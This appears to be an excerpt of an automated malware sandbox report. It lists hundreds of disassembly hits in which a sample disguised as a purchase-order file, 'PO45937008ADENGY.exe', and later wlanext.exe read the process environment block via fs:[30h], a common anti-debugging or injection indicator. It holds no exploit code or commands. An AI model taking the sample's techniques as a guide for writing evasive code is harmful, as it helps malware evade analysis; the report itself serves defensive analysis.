Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h] 9_2_013A7016
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1074 mov eax, dword ptr fs:[00000030h] 9_2_013F1074
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E2073 mov eax, dword ptr fs:[00000030h] 9_2_013E2073
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01340050 mov eax, dword ptr fs:[00000030h] 9_2_01340050
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01340050 mov eax, dword ptr fs:[00000030h] 9_2_01340050
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov ecx, dword ptr fs:[00000030h] 9_2_0135F0BF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h] 9_2_0135F0BF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h] 9_2_0135F0BF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013690AF mov eax, dword ptr fs:[00000030h] 9_2_013690AF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329080 mov eax, dword ptr fs:[00000030h] 9_2_01329080
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h] 9_2_013A3884
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h] 9_2_013A3884
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013258EC mov eax, dword ptr fs:[00000030h] 9_2_013258EC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov ecx, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E131B mov eax, dword ptr fs:[00000030h] 9_2_013E131B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h] 9_2_01353B7A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h] 9_2_01353B7A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132DB60 mov ecx, dword ptr fs:[00000030h] 9_2_0132DB60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8B58 mov eax, dword ptr fs:[00000030h] 9_2_013F8B58
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132F358 mov eax, dword ptr fs:[00000030h] 9_2_0132F358
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132DB40 mov eax, dword ptr fs:[00000030h] 9_2_0132DB40
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h] 9_2_01354BAD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h] 9_2_01354BAD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h] 9_2_01354BAD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F5BA5 mov eax, dword ptr fs:[00000030h] 9_2_013F5BA5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352397 mov eax, dword ptr fs:[00000030h] 9_2_01352397
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135B390 mov eax, dword ptr fs:[00000030h] 9_2_0135B390
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E138A mov eax, dword ptr fs:[00000030h] 9_2_013E138A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h] 9_2_01331B8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h] 9_2_01331B8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DD380 mov ecx, dword ptr fs:[00000030h] 9_2_013DD380
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134DBE9 mov eax, dword ptr fs:[00000030h] 9_2_0134DBE9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h] 9_2_013A53CA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h] 9_2_013A53CA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h] 9_2_01364A2C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h] 9_2_01364A2C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov ecx, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h] 9_2_01325210
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h] 9_2_0132AA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h] 9_2_0132AA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01343A1C mov eax, dword ptr fs:[00000030h] 9_2_01343A1C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h] 9_2_013EAA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h] 9_2_013EAA16
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01338A0A mov eax, dword ptr fs:[00000030h] 9_2_01338A0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136927A mov eax, dword ptr fs:[00000030h] 9_2_0136927A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h] 9_2_013DB260
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h] 9_2_013DB260
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8A62 mov eax, dword ptr fs:[00000030h] 9_2_013F8A62
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EEA55 mov eax, dword ptr fs:[00000030h] 9_2_013EEA55
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013B4257 mov eax, dword ptr fs:[00000030h] 9_2_013B4257
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h] 9_2_01329240
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0133AAB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0133AAB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FAB0 mov eax, dword ptr fs:[00000030h] 9_2_0135FAB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h] 9_2_013252A5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h] 9_2_0135D294
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h] 9_2_0135D294
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352AE4 mov eax, dword ptr fs:[00000030h] 9_2_01352AE4
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352ACB mov eax, dword ptr fs:[00000030h] 9_2_01352ACB
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AD30 mov eax, dword ptr fs:[00000030h] 9_2_0132AD30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h] 9_2_01333D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EE539 mov eax, dword ptr fs:[00000030h] 9_2_013EE539
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8D34 mov eax, dword ptr fs:[00000030h] 9_2_013F8D34
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013AA537 mov eax, dword ptr fs:[00000030h] 9_2_013AA537
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h] 9_2_01354D3B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h] 9_2_01354D3B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h] 9_2_01354D3B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h] 9_2_0134C577
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h] 9_2_0134C577
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01347D50 mov eax, dword ptr fs:[00000030h] 9_2_01347D50
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01363D43 mov eax, dword ptr fs:[00000030h] 9_2_01363D43
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3540 mov eax, dword ptr fs:[00000030h] 9_2_013A3540
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h] 9_2_01351DB5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h] 9_2_01351DB5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h] 9_2_01351DB5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h] 9_2_013F05AC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h] 9_2_013F05AC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013535A1 mov eax, dword ptr fs:[00000030h] 9_2_013535A1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h] 9_2_0135FD9B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h] 9_2_0135FD9B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581 mov eax, dword ptr fs:[00000030h] 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h] 9_2_01322D8A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013D8DF1 mov eax, dword ptr fs:[00000030h] 9_2_013D8DF1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h] 9_2_013EFDE2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov ecx, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h] 9_2_013A6DC9
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135BC2C mov eax, dword ptr fs:[00000030h] 9_2_0135BC2C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h] 9_2_013A6C0A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F740D mov eax, dword ptr fs:[00000030h] 9_2_013F740D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F740D mov eax, dword ptr fs:[00000030h] 9_2_013F740D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F740D mov eax, dword ptr fs:[00000030h] 9_2_013F740D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h] 9_2_013E1C06
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134746D mov eax, dword ptr fs:[00000030h] 9_2_0134746D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h] 9_2_013BC450
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h] 9_2_013BC450
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A44B mov eax, dword ptr fs:[00000030h] 9_2_0135A44B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133849B mov eax, dword ptr fs:[00000030h] 9_2_0133849B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E14FB mov eax, dword ptr fs:[00000030h] 9_2_013E14FB
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h] 9_2_013A6CF0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8CD6 mov eax, dword ptr fs:[00000030h] 9_2_013F8CD6
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135E730 mov eax, dword ptr fs:[00000030h] 9_2_0135E730
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h] 9_2_01324F2E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134F716 mov eax, dword ptr fs:[00000030h] 9_2_0134F716
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h] 9_2_013BFF10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F070D mov eax, dword ptr fs:[00000030h] 9_2_013F070D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h] 9_2_0135A70E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133FF60 mov eax, dword ptr fs:[00000030h] 9_2_0133FF60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8F6A mov eax, dword ptr fs:[00000030h] 9_2_013F8F6A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133EF40 mov eax, dword ptr fs:[00000030h] 9_2_0133EF40
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01338794 mov eax, dword ptr fs:[00000030h] 9_2_01338794
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h] 9_2_013A7794
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013637F5 mov eax, dword ptr fs:[00000030h] 9_2_013637F5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DFE3F mov eax, dword ptr fs:[00000030h] 9_2_013DFE3F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132E620 mov eax, dword ptr fs:[00000030h] 9_2_0132E620
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h] 9_2_0135A61C
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h] 9_2_0132C600
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01358E00 mov eax, dword ptr fs:[00000030h] 9_2_01358E00
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1608 mov eax, dword ptr fs:[00000030h] 9_2_013E1608
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h] 9_2_0134AE73
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133766D mov eax, dword ptr fs:[00000030h] 9_2_0133766D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h] 9_2_01337E41
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h] 9_2_013EAE44
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h] 9_2_013F0EA5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A46A7 mov eax, dword ptr fs:[00000030h] 9_2_013A46A7
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BFE87 mov eax, dword ptr fs:[00000030h] 9_2_013BFE87
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013376E2 mov eax, dword ptr fs:[00000030h] 9_2_013376E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013516E0 mov ecx, dword ptr fs:[00000030h] 9_2_013516E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8ED6 mov eax, dword ptr fs:[00000030h] 9_2_013F8ED6
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01368EC7 mov eax, dword ptr fs:[00000030h] 9_2_01368EC7
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013536CC mov eax, dword ptr fs:[00000030h] 9_2_013536CC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DFEC0 mov eax, dword ptr fs:[00000030h] 9_2_013DFEC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952397 mov eax, dword ptr fs:[00000030h] 17_2_03952397
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395B390 mov eax, dword ptr fs:[00000030h] 17_2_0395B390
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E138A mov eax, dword ptr fs:[00000030h] 17_2_039E138A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h] 17_2_03931B8F
